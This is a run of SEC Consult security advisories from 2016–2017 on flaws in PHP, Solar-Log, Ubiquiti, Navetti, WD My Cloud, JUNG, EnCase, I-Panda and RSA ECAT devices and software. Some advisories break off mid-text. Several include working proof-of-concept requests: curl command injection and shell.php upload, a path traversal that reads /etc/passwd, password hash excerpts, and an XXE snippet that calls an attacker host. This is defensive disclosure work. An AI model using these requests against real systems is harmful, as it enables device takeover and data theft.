by: Fikri Fadzil (Office Kuala Lumpur)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===
Vendor description:
---
"PHP is a popular general-purpose scripting language that is especially suited
to web development. Fast, flexible and pragmatic, PHP powers everything from
your blog to the most popular websites in the world."
Source: http://www.php.net/
Business recommendation:
By making use of this issue, it is possible for an attacker to bypass current
prevention mechanisms used to protect the "fsockopen" function in PHP to perform
server-side request forgery attacks.
SEC Consult recommends to check the developed or installed websites for any
possibility to exploit any form of vulnerability due to this issue.
Vulnerability overview/description:
---
The "fsockopen" function in PHP will respond differently if two port numbers
are given at once. As many developers assume the function will prioritize the
port number given to the second function parameter, an attacker may utilize this
unpredictable behavior to e.g. conduct a server-side request forgery attack.
Proof of concept:
-
The "fsockopen" function in PHP will not use the port number given to the
second parameter if the hostname already has a port number appended. The
example below should explain misbehavior of the function.
// This request will go to port 80
fsockopen("192.168.184.132", 80);
// This request will go to port 53
fsockopen("192.168.184.132:53", 80);
Instead of initiating a socket connection on port 80 as given in the second
parameter, the function appears to use the port number 53 which is
appended to the hostname.
Vulnerable / tested versions:
-
PHP version 7.0.11 and 7.1.2 have been tested and found to be vulnerable.
Older PHP versions are potentially affected as well.
Vendor contact timeline:
2017-03-07: Reported the issue through PHP Bug Tracking System. (SecBug #74216)
https://bugs.php.net/bug.php?id=74216
2017-03-07: Changes were committed to the PHP's main repo in Github.
https://github.com/php/php-src/commit/bab0b99f376dac9170ac81382a5ed526938d595a
2017-04-03: Public disclosure of the advisory
Solution:
-
Patch:
https://github.com/php/php-src/commit/bab0b99f376dac9170ac81382a5ed526938d595a
Workaround:
---
It is recommended to restrict user input data for a hostname to not have a
port number appended.
Advisory URL:
-
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF Fikri Fadzil / @2017
signature.asc
Description: OpenPGP digital signature
SEC Consult SA-20170322-0 :: Multiple vulnerabilities in Solare Datensysteme Solar-Log devices
SEC Consult Vulnerability Lab Security Advisory < 20170322-0 >
===
title: Multiple vulnerabilities
product: Solare Datensysteme GmbH
Solar-Log 250/300/500/800e/1000/1000 PM+/1200/2000
vulnerable version: Firmware 2.8.4-56 / 3.5.2-85
fixed version: Firmware 3.5.3-86
CVE number: -
impact: Critical
homepage: http://www.solar-log.com/de/home.html
found: 2017-01-23
by: T. Weber (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===
Vendor description:
---
"Solare Datensysteme GmbH (SDS) is headquartered in the southern German city
of Binsdorf and specialises in the development and sale of monitoring systems
for photovoltaic plants. The company was founded in 2007 by Thomas Preuhs and
Jörg Karwath and was created from the company "TOP Solare Datensysteme". This
company had been developing and selling the "SolarLog™" product range since
2005. Our core competence covers innovative products with short development
cycles and an excellent cost/performance ratio. Our developments have the
outstanding characteristics of high customer value, simple operation and
universal application without requiring time-consuming installation of
software."
Source: http://www.solar-log.uk/gb-en/unternehmen/ueber-uns.html
Business recommendation:
SEC Consult recommends to immediately install the available firmware update
and restrict network access.
Furthermore, this device should not be used in production until a thorough
security review has been performed by security professionals and all
identified issues have been resolved.
Vulnerability overview/description:
---
1) Unauthenticated Download of Configuration including Device-Password
This vulnerability is present at least on firmware 2.8.4-56.
An attacker can download the configuration file without authentication and
extract the password to login to Solar-Log. Therefore, an attacker can gain
administrative access to such a device without prior authentication.
2) Cross-Site Request Forgery (CSRF)
This vulnerability is present at least on firmware 3.5.2-85.
A CSRF vulnerability enables an attacker to remove/modify a password of a
device by luring an authenticated user to click on a crafted link. An attacker
is able to take over the device by exploiting this vulnerability.
3) Unauthenticated Arbitrary File Upload
This vulnerability is present at least on firmware 3.5.2-85.
Any files can be uploaded on the Solar-Log by using a crafted POST request. An
attacker can start a malicious website or use the Solar-Log as share to store
any (illegal) contents.
4) Information Disclosure (CVE-2001-1341)
All Solar-Log devices in the current firmware versions are prone to this
information disclosure vulnerability. (2.8.4-56 / 3.5.2-85)
The network configuration of the internal network including the gateway and
the MAC address of the device are leaked.
All details of the IPC@CHIP from Beck IPC (https://www.beck-ipc.com/) like RTOS
version and serial number are leaked as well.
5) Unauthenticated Change of Network-Configuration
All Solar-Log devices in the current firmware versions are prone to this
vulnerability. (2.8.4-56 / 3.5.2-85)
Since the Solar-Log is based on the chips of Beck IPC a UDP configuration
server is enabled by default. This server allows to change the IP configuration
over a specific UDP port. This functionality can be protected with a password,
but this is not set in the affected firmware versions.
The MAC address, which is leaked by 4), is needed to configure the device.
An attacker can reconfigure the device without any authentication.
6) Unauthenticated Denial of Service
All Solar-Log devices in the current firmware versions are prone to this
vulnerability. (2.8.4-56 / 3.5.2-85)
The Beck IPC UDP configuration server on Solar-Log device can be attacked with
arbitrary UDP packets to permanently disable the Solar-Log until a manual
reboot is triggered.
7) Potential Unauthenticated Reprogram of IPC@CHIP Flash Memory
Potentially available in all Solar-Log devices in the current firmware
versions. (2.8.4-56 / 3.5.2-85)
Since the "CHIPTOOL" from BECK IPC enables a developer to reprogram the chip
over the network via UDP, a missing password can also enable an attacker to do
this on a Solar-Log device. This action can lead to a simple Denial of Service
or a complex botnet of Solar-Log devices!
Proof of concept:
SEC Consult SA-20170316-0 :: Authenticated command injection in multiple Ubiquiti Networks products
SEC Consult Vulnerability Lab Security Advisory < 20170316-0 >
===
title: Authenticated Command Injection
product: Multiple Ubiquiti Networks products, e.g.
TS-16-CARRIER, TS-5-POE, TS-8-PRO, AG-HP-2G16,
AG-HP-2G20, AG-HP-5G23, AG-HP-5G27, AirGrid M,
AirGrid M2, AirGrid M5, AR, AR-HP, BM2HP, BM2-Ti,
BM5HP, BM5-Ti, LiteStation M5, locoM2, locoM5,
locoM9, M2, M3, M365, M5, M900, NB-2G18, NB-5G22,
NB-5G25, NBM3, NBM365, NBM9, NSM2, NSM3, NSM365,
NSM5, PBM10, PBM3, PBM365, PBM5, PICOM2HP,
Power AP N
vulnerable version: v1.3.3 (SW), v5.6.9/v6.0 (XM)
fixed version: -
CVE number: -
impact: Critical
homepage: https://www.ubnt.com
found: 2016-11-22
by: T. Weber (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===
Vendor description:
---
"Ubiquiti Networks develops high-performance networking
technology for service providers and enterprises. Our technology
platforms focus on delivering highly advanced and easily deployable
solutions that appeal to a global customer base in underserved and
underpenetrated markets."
Source: http://ir.ubnt.com/
Business recommendation:
SEC Consult recommends not to use this product in a production environment
until a thorough security review has been performed by security
professionals and all identified issues have been resolved.
Vulnerability overview/description:
---
1) Command Injection in Admin Interface
A command injection vulnerability was found in "pingtest_action.cgi".
This script is vulnerable since it is possible to inject a value of a
variable. One of the reasons for this behaviour is the used PHP version
(PHP/FI 2.0.1 from 1997).
The vulnerability can be exploited by luring an attacked user to click
on a crafted link or just surf on a malicious website. The whole attack
can be performed via a single GET-request and is very simple since there
is no CSRF protection. See our other advisory published in January 2017:
https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20170130-0_Ubiquiti_Networks_XSS_CSRF_v10.txt
An attacker can open a port binding or reverse shell to connect to the
device and is also able to change the "passwd" since the web service
runs with root privileges!
Furthermore, low privileged read-only users, which can be created in the web
interface, are also able to perform this attack.
If the Ubiquiti device acts as router or even as firewall, the attacker
can take over the whole network by exploiting this vulnerability.
Proof of concept:
-
1) Command Injection in Admin Interface
The following link can be used to open a reverse shell to the attacker's
IP address. There are two possibilities for the different firmware
versions.
Reverse root shell - firmware: v1.3.3 (SW)
[ PoC removed - no patch available ]
Reverse root shell - firmware: v5.6.9/v6.0 (XM)
[ PoC removed - no patch available ]
A video is available here: https://youtu.be/oU8GNeP_Aps
Vulnerable / tested versions:
-
The following devices and firmware versions have been tested/verified:
TS-8-PRO - v1.3.3 (SW)
(Rocket) M5 - v5.6.9/v6.0 (XM)
(PicoStationM2HP) PICOM2HP - v5.6.9/v6.0 (XM)
(NanoStationM5) NSM5 - v5.6.9/v6.0 (XM)
Based on information embedded in the firmware of other Ubiquiti products
gathered from our IoT Inspector tool we believe the following devices are
affected as well:
Ubiquiti Networks AF24 (Version: AF24 v3.2)
Ubiquiti Networks AF24HD (Version: AF24 v3.2)
Ubiquiti Networks AF-2X (Version: AF2X v3.2 )
Ubiquiti Networks AF-3X (Version: AF3X v3.2)
Ubiquiti Networks AF5 (Version: AF5 v3.2)
Ubiquiti Networks AF5U (Version: AF5 v3.2)
Ubiquiti Networks AF-5X (Version: AF5X v3.2.1)
Ubiquiti Networks AG-PRO-INS (Version: AirGWP v1.1.7)
Ubiquiti Networks airGateway (Version: AirGW v1.1.7)
Ubiquiti Networks airGateway-LR (Version: AirGW v1.1.7)
Ubiquiti Networks AMG-PRO (Version: AirGWP v1.1.7)
Ubiquiti Networks LBE-5AC-16-120 (Version: WA v7.2.4)
Ubiquiti Networks LBE-5AC-23 (Version: WA v7.2.4)
Ubiquiti Networks LBE-M5-23 (Version: XW v5.6.9/v6.0)
Ubiquiti Networks NBE-5AC-16 (Version: WA v7.2.4)
Ubiquiti Networks NBE-5AC-19 (Version: XC v7.2.4)
Ubiquiti Networks NBE-M2-13 (Version: XW v5.6
SEC Consult SA-20170308-0 :: Multiple vulnerabilities in Navetti PricePoint
SEC Consult Vulnerability Lab Security Advisory < 20170308-0 >
===
title: Multiple vulnerabilities
product: Navetti PricePoint
vulnerable version: 4.6.0.0
fixed version: 4.7.0.0 or higher
CVE number: -
impact: high/critical
homepage: http://www.navetti.com/
found: 2016-07-18
by: W. Schober (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===
Vendor description:
---
"Navetti PricePoint is the ultimate business tool for controlling, managing and
measuring all aspects of your pricing. Our clients have been able to increase
their revenue and profitability substantially, implement market- and value-based
pricing, increase customer trust and implement a common business language
throughout their organization. In addition, with Navetti PricePoint our clients
are able to implement governance processes, manage risk and ensure organization
compliance, and attain business sustainability."
Source:
http://www.navetti.com/our-expertise/navetti-pricepoint/
Business recommendation:
During a quick security check, SEC Consult identified four vulnerabilities,
which are partially critical. As the time frame of the test was limited, it is
suspected that there are more vulnerabilities in the application.
It is highly recommended by SEC Consult to apply the patch resolving the
identified vulnerabilities before using Navetti PricePoint in an environment
with potential attackers.
Vulnerability overview/description:
---
1) SQL Injection (Blind boolean based)
Navetti PricePoint is prone to SQL injection attacks. The attacks can be
executed by all privilege levels, ranging from the lowest privileged users to
the highest privileged users.
By exploiting this vulnerability, an attacker gains access to all records
stored in the database with the privileges of the database user.
2) Multiple persistent cross site scripting vulnerabilities
The web application suffers from multiple persistent cross site scripting
issues.
Low privileged users as well as high privileged users, are able to inject
malicious JavaScript payloads persistently in the application. This
vulnerability is even more critical, because it can be used by a low privileged
user who wants to elevate his privileges. The low privileged attacker can
place a payload which creates a new superuser, or add his own account to the
superuser group. If a superuser logs in to the application, the JavaScript
payload is executed with the rights of the superuser and the new user is
created or added to the superuser group.
3) Multiple reflected cross site scripting vulnerabilities
Navetti PricePoint suffers from multiple reflected cross site scripting issues.
The code which is used to generate error messages inside of the application,
does not correctly escape/sanitize user input. Due to that all error messages
containing user input are prone to reflected cross site scripting attacks.
Furthermore the file upload dialog does not correctly sanitize the file name of
uploaded files. If a file name contains a JavaScript payload, it is executed in
the file upload dialog.
4) Cross Site Request Forgery
Navetti PricePoint doesn't implement any kind of cross site request forgery
protection. Attackers are able to execute arbitrary requests with the privileges
of any user. The only requirement is, that the victim clicks on a malicious
link. For example an administrator can be forced to execute unwanted actions.
Some of these actions are:
-) Add users
-) Delete users
-) Add users to an arbitrary role
-) Change internal settings of the application
Proof of concept:
-
1) SQL Injection (Blind boolean based)
The search function in the tree structure, which displays various groups, does
not properly validate user input, allowing an attacker with any privilege level
to inject arbitrary SQL commands and read the contents of the whole database.
The following URL could be used to perform blind SQL injection attacks:
-) URL: /NBN.Host/PMWorkspace/PMWorkspace/FamilieTreeSearch
(Parameter: searchString, Type: GET)
2) Multiple persistent cross site scripting vulnerabilities
The following URL parameters have been identified to be vulnerable against
persistent cross site scripting:
-) URL: /NBN.Host/Component/Competitors/AddEdit (Parameter: name,POST)
-) URL: /NBN.Host/Component/ItemSearchGrid/EditData (Parameter: Quality105,POST)
-) URL: /NBN.Host/component/GroupInfo/SaveGroup (Para
SEC Consult SA-20170307-0 :: Unauthenticated OS command injection & arbitrary file upload in Western Digital WD My Cloud
SEC Consult Vulnerability Lab Security Advisory < 20170307-0 >
===
title: Unauthenticated OS command injection & arbitrary file
upload
product: Western Digital My Cloud
vulnerable version: at least: 2.21.126 (My Cloud), 2.11.157(My Cloud EX2),
2.21.126 (My Cloud EX2 Ultra), 2.11.157 (My Cloud EX4),
2.21.126 (My Cloud EX2100), 2.21.126 (My Cloud EX4100),
2.11.157 (My Cloud Mirror), 2.21.126 (My Cloud Mirror
Gen2), 2.21.126 (My Cloud PR2100), 2.21.126 (My Cloud
PR4100), 2.21.126 (My Cloud DL2100), 2.21.126 (My Cloud
DL4100)
fixed version: -
CVE number: -
impact: Critical
homepage: https://www.wdc.com/en-um/
found: 2017-01-17
by: Wan Ikram (Office Kuala Lumpur)
Fikri Fadzil (Office Kuala Lumpur)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===
Vendor description:
---
"Reliable, centralized personal storage with automatic backup that plugs into
your own home network. Share whatever you want, anywhere you have an Internet
connection."
Source: https://www.wdc.com/products/personal-cloud-storage/my-cloud.html
Business recommendation:
By combining the vulnerabilities documented in this advisory an attacker
can fully compromise a WD My Cloud device. In the worst case one could steal
sensitive data stored on the device or use it as a jump host for further
internal attacks.
SEC Consult recommends not to attach WD My Cloud to the network until
a thorough security review has been performed by security professionals and
all identified issues have been resolved.
Vulnerability overview/description:
---
The firmware doesn't apply proper validation on many user inputs. As a
result, below vulnerabilities could be exploited by unauthenticated attackers
to fully compromise the device.
1. Unauthenticated OS Command Injection
Any OS commands can be injected by unauthenticated attackers. This is a
serious vulnerability as the chances for the device to be fully compromise is
very high.
2. Unauthenticated Arbitrary File Upload
A malicious file can be uploaded into the webserver with no authentication
required. It is possible for an attacker to upload a script to issue operating
system commands.
3. Cross Site Request Forgery (CSRF)
There is no anti-CSRF mechanism implemented in the firmware. Due to this, an
attacker can force a user to execute any action through any script. As the
vulnerabilities described in 1) and 2) do not need authentication, those can
be exploited via CSRF over the Internet as well!
Proof of concept:
-
1. Unauthenticated OS Command Injection
Below is a sample cURL request to execute arbitrary OS command for one of
vulnerable scripts.
$ curl
http://$IP/web/addons/jqueryFileTree.php?host=x=x=x=x=x\"\;
\; echo \"x
2. Unauthenticated Arbitrary File Upload
Below is the cURL request to upload arbitrary files on the webserver.
$ curl -F "file=@shell.php"
http://$IP/web/addons/upload.php?name=x==
3. Cross Site Request Forgery (CSRF)
There is no anti-CSRF mechanism implemented for all accessible scripts in the
firmware.
Vulnerable / tested versions:
-
The following device & firmware has been tested and found to be vulnerable:
2.11.157 (My Cloud EX2)
As the firmware used by all My Cloud devices are more or less similar, we
believe the other versions are also prone to the same vulnerabilities. This
could
be verified by using the IoT Inspector software for automated firmware analysis.
Vendor contact timeline:
2017-01-18: Contacting vendor through "WD Support - Create a Support Case"
page (https://support.wdc.com/support/case.aspx?lang=en).
Assigned ticket number - 011817-11728265.
2017-01-19: Vendor: replies to the ticket asking for more clarification.
2017-01-20: Replied to the vendor, requesting security contact and encryption
keys
2017-01-23: Vendor: "we don't have a security department that we could forward
this concern"
2017-01-23: Telling support that there seems to be a security contact by
referencing other WD advisories, requesting security contact again
2017-01-24: Vendor: asking for affected product name and firmware version.
2017-01-24: Providing list of affected product name and firmware versions,
SEC Consult SA-20170207 :: Path Traversal, Backdoor accounts & KNX group address password bypass in JUNG Smart Visu server
SEC Consult Vulnerability Lab Security Advisory < 20170207-0 >
===
title: Path Traversal, Backdoor accounts & KNX group address
password bypass
product: JUNG Smart Visu Server
vulnerable version: Firmware v1.0.804/1.0.830/1.0.832
fixed version: Firmware v1.0.900
CVE number: -
impact: Critical
homepage: http://www.jung.de/
found: 2016-11-10
by: T. Weber (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===
Vendor description:
---
"JUNG provides equipment and systems that win over by advanced technology,
sophisticated design, and a large variety of features. On the one hand,
our portfolio includes switches, socket outlets, dimmer, and observers.
On the other, it includes innovative systems for controlling features in
your home. From lighting, blind, or temperature control to wireless and
KNX technologies, door communication, and multimedia control, a large
range of applications is covered. In addition to comfort and security,
also the requirements regarding cost-effectiveness and energy efficiency
are met."
Source:http://www.jung.de/en/1828/company/company-portrait/
Business recommendation:
Attackers are able to gain root access through SSH with the credentials of
the backdoor user account. A attacker can also unlock the group address
protection for the KNX device mapping.
JUNG has provided updated firmware which should be installed immediately.
SEC Consult recommends not to use this product in a production environment
until a thorough security review has been performed by security professionals
and all identified issues have been resolved.
Vulnerability overview/description:
---
1) Path Traversal Vulnerability
The Smart Visu Server runs with root privileges and is vulnerable to path
traversal. This leads to full information disclosure of all files on the
system.
2) Backdoor Accounts
Two undocumented operating system user accounts are present on the appliance.
They can be used to gain access to the Smart Visu Server via SSH.
3) Group Address (GA) unlock without Password
As protection functionality, the KNX group address can be locked with a
user-defined password. This password can be removed by using a single PUT
request. An attacker can completely change the configuration of the connected
devices (e.g. a light switch in the kitchen can be swapped with the air
conditioner).
Proof of concept:
-
1) Path Traversal Vulnerability
The Smart Visu Server is vulnerable to path traversal by sending the
following GET-Request:
Request
GET /SV-Home//..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd HTTP/1.1
Host:
[...]
--- Response
HTTP/1.1 200 OK
Content-Disposition: inline;filename="passwd"
[...]
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
[...]
-
2) Backdoor Accounts
Two undocumented operating system user accounts are present on the appliance.
They can be used to gain access to Smart Visu Server over SSH on Port 5.
Excerpt of the shadow file:
root:$6$Zcv.yVRg$0OfnoSEEWdP4K/2z5Mm/56nfGbdAPl4ZSm3oDWqn3fMD9cXfZCov7O/siheuYggHxuqHvZQ7nPSBM5BcbrH9n.:16840:0:9:7:::
daemon:*:15914:0:9:7:::
[...]
avahi:*:16541:0:9:7:::
jung:$6$1SblJl3F$q6h6vfSC.IataQSqDNGw0wGvV8m/x8uLozBIj4Yj.ZzMoHbaMvzb2tR.B45I/ajsWpwkTcCNGjSZsLdC9IuzD.:16714:0:9:7:::
3) Group Address (GA) unlock without Password
The following PUT request sends a JSON object to the server, which removes the
password:
Request
PUT /rest/items/knxcom_datastore HTTP/1.1
Host:
[...]
{"groupNames":[],"name":"knxcom_datastore","label":"knxcom_datastore","type":"GroupItem","tags":["{\"lock_ga\":false}"]}
-
Vulnerable / tested versions:
-
Firmware version 1.0.804, 1.0.830 and 1.0.832 have been tested and found to be
vulnerable.
Vendor contact timeline:
2016-11-21: Contacting vendor through kundencen...@jung.de, ma
SEC Consult SA-20161128-0 :: DoS & heap-based buffer overflow in Guidance Software EnCase Forensic
SEC Consult Vulnerability Lab Security Advisory < 20161128-0 >
===
title: Denial of service & heap-based buffer overflow
product: Guidance Software EnCase Forensic Imager & EnCase Forensic
vulnerable version: EnCase Forensic Imager<= 7.10
EnCase Forensic (tested with version 7.08.00.137)
fixed version: -
CVE number: -
impact: high
homepage: https://www.guidancesoftware.com/encase-forensic-imager
found: 2016-09-30
by: Wolfgang Ettlinger (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===
Vendor description:
---
"When time is short and you need to acquire entire volumes or selected
individual folders, EnCase Forensic Imager is your tool of choice. Based on
trusted, industry-standard EnCase Forensic technology, EnCase Forensic Imager:
* Is free to download and use
* Requires no installation
* Is a standalone product that does not require an EnCase Forensic license
* Enables acquisition of local drives (network drives are not able to be
acquired with Imager)
* Provides easy viewing and browsing of potential evidence files, including
folder structures and file metadata
* Can be deployed via USB stick and used to perform acquisition of a live
device"
URL: https://www.guidancesoftware.com/encase-forensic-imager
Business recommendation:
SEC Consult recommends not to use Encase Forensic Imager or the Encase Forensic
Suite until a thorough security review has been performed by security
professionals and all identified issues have been resolved.
Vulnerability overview/description:
---
1) Denial of Service
Several manipulated hard disk images cause Encase Forensic Imager to crash. A
suspect manipulating the hard drive could potentially hinder an investigator
from using Encase Forensic Imager for creating hard disk images.
Encase Forensic (v7) has been tested and found to be affected as well.
2) Heap-based buffer overflow
Using a manipulated ReiserFS image an attacker can overwrite heap memory on the
investigator's machine. Because of several restrictions SEC Consult was unable
to create an exploit that works reliably within a reasonable timeframe.
However, as with most heap-based buffer overflow vulnerabilities it is possible
that an attacker could gain arbitrary code execution nevertheless.
Proof of concept:
-
SEC Consult has created proof of concept disk images that will crash Encase.
Those
PoC images will not be released.
1) Denial of Service
The following list demonstrates cases that cause Encase to crash. The
investigators would be unable to analyze the hard disk/partition/image using the
affected products:
* Ext3:
- Several conditions cause Encase Forensic Imager to encounter an div/0
exception. Disk images that were manipulated in the following way
demonstrate this issue. Those crashes have not been further
investigated as to whether code execution is possible.
+ nummer of blocks per group: 0x
+ total numer of blocks: 0x
+ last mount path: 'A'*10
+ volume name: 'A'*10
+ block number of the superblock: 0
+ FS-Id: 'A'*10
- Manipulating the size of the inode structure value (e.g. 0x) causes
Encase Forensic Imager to write beyond the limits of a previously
allocated (VirtualAlloc) segment.
* Iso9660:
- If the length of a file name is specified in a way that it would exceed
the end of the last block, Encase Forensic Imager crashes while trying to
read beyond an allocated segment.
* ReiserFs:
- When setting a block size of below 0x200 the application overwrites heap
memory with attacker-supplied data.
* GPT:
- When specifying an overly long name (in our setup longer than 0x3fc6) for a
partition, Encase Forensic crashes failing to read memory when trying to
determine the length of the string. The partition table can be constructed
in a way that it can also be used for storing data. However, an investigator
using Encase will not be able to analyze it.
2) Heap-based buffer overflow
The manipulated ReiserFs image that causes the application to overwrite heap
memory can be tuned to overwrite heap-data with attacker-controlled data.
The application calculates a value (here called "dev_block_count") as:
dev_block_count =
blocksize from image (e.g. 0x200)
/ blocksize of reading device (typically 0x200)
* number of blocks
.text:0
SEC Consult SA-20161114-0 :: Multiple vulnerabilities in I-Panda SolarEagle - Solar Controller Administration Software / MPPT Solar Controller SMART2
SEC Consult Vulnerability Lab Security Advisory < 20161114-0 >
===
title: Multiple vulnerabilities
product: I-Panda SolarEagle - Solar Controller Administration
Software / MPPT Solar Controller SMART2
vulnerable version: SolarEagle V2.00 / MPPT Solar Controller SMART2
fixed version: -
CVE number: -
impact: Medium
homepage: http://www.solarcontroller-inverter.com/
found: 2016-09-03
by: T. Weber (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===
Vendor description:
---
"ShenZhen I-Panda Electronics Co. Ltd. is developing power supply devices
such as UPS, power adapter and power inverter and also equipment for solar
systems. This equipment produced by I-Panda comprises solar panels/
controllers/inverters and also solar generator systems."
Source: http://www.solarcontroller-inverter.com/about-us.html
Business recommendation:
SEC Consult recommends not to use this product until a thorough security
review has been performed by security professionals and all identified
issues have been resolved.
Vulnerability overview/description:
---
1) Broken Local Admin Authentication in SolarEagle V2.00
Attackers which have access to the locally installed software are able to
bypass the administrative login and can control the MPPT Solar Controller.
2) Missing Server Side Authentication in MPPT Solar Controller SMART2
Attackers which have access to the local network can send their own commands
to the MPPT Solar Controller and are able to control the device this way.
3) Unencrypted Communication in MPPT Solar Controller SMART2
Eavesdropping the communication is possible since unencrypted TCP is used
for all packets which are transferred between the controller and SolarEagle.
4) Denial of Service in MPPT Solar Controller SMART2
Attackers are able to disrupt an active connection as long as they want.
Proof of concept:
-
The vendor was not responsive, hence there is no fix available. The proof of
concept has been removed from this advisory.
Vulnerable / tested versions:
-
SolarEagle V2.00 / MPPT Solar Controller SMART2
Vendor contact timeline:
2016-09-12: Contacting vendor through email, sending responsible disclosure
policy, defining release deadline (10th November), asking for
encryption keys
2016-09-13: Contacting vendor through email, sending responsible disclosure
policy, defining release deadline (10th November), asking for
encryption keys
2016-09-13: Vendor: (Instant-Messenger) No encryption available. Offer to
send the advisory unencrypted; No Answer
2016-10-29: Offer to send the advisory unencrypted; No Answer
2016-11-03: Offer to send the advisory unencrypted; No Answer
2016-11-14: SEC Consult releases security advisory
Solution:
-
There is no fix available from the vendor as they did not respond.
Workaround:
---
No workaround
Advisory URL:
-
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF
SEC Consult SA-20161011-0 :: XXE vulnerability in RSA Enterprise Compromise Assessment Tool (ECAT)
SEC Consult Vulnerability Lab Security Advisory < 20161011-0 >
===
title: XML External Entity Injection (XXE)
product: RSA Enterprise Compromise Assessment Tool (ECAT)
vulnerable version: 4.1.0.1
fixed version: 4.1.2.0
CVE Number: -
impact: Medium
homepage: https://www.rsa.com
found: 2016-04-27
by: Samandeep Singh (Office Singapore)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===
Vendor description:
---
"RSA provides more than 30,000 customers around the world with the essential
security capabilities to protect their most valuable assets from cyber threats.
With RSA's award-winning products, organizations effectively detect,
investigate, and respond to advanced attacks; confirm and manage identities; and
ultimately, reduce IP theft, fraud, and cybercrime."
Source: https://www.rsa.com/en-us/company/about
Business recommendation:
By exploiting the XXE vulnerability, an attacker can get read access to the
filesystem of the user's system using RSA ECAT client and thus obtain sensitive
information from the system. It is also possible to scan ports of the internal
hosts and cause DoS on the affected host.
SEC Consult recommends not to use the product until a thorough security
review has been performed by security professionals and all identified
issues have been resolved.
Vulnerability overview/description:
---
1) XML External Entity Injection
The used XML parser is resolving external XML entities which allows attackers
to read files and send requests to systems on the internal network (e.g port
scanning). The vulnerability can be exploited by tricking the user of
the application to import a whitelisting file with malicious XML code.
Proof of concept:
-
1) XML External Entity Injection (XXE)
The RSA ECAT client allows users to import whitelisting files in XML format.
By tricking the user to import an XML file with malicious XML code to the
application, it's possible to exploit an XXE vulnerability within the
application.
For example by importing the following XML code, arbitrary files can be read
from the client's system. The following code generates the connection request
from the client system to attacker system.
===
http://[IP:port]/; >]>
===
IP:port = IP address and port where the attacker is listening for connections
Furthermore some files can be exfiltrated to remote servers via the
techniques described in:
https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-wp.pdf
http://vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf
Vulnerable / tested versions:
-
The XXE vulnerability has been verified to exist in the RSA ECAT software
version 4.1.0.1 which was the latest version available at the time of
discovery.
Vendor contact timeline:
2016-04-28: Vulnerabilities reported to the vendor by 3rd party
2016-06-23: Fixed by vendor in version 4.1.2 (ECAT-5972)
2016-10-11: SEC Consult releases security advisory
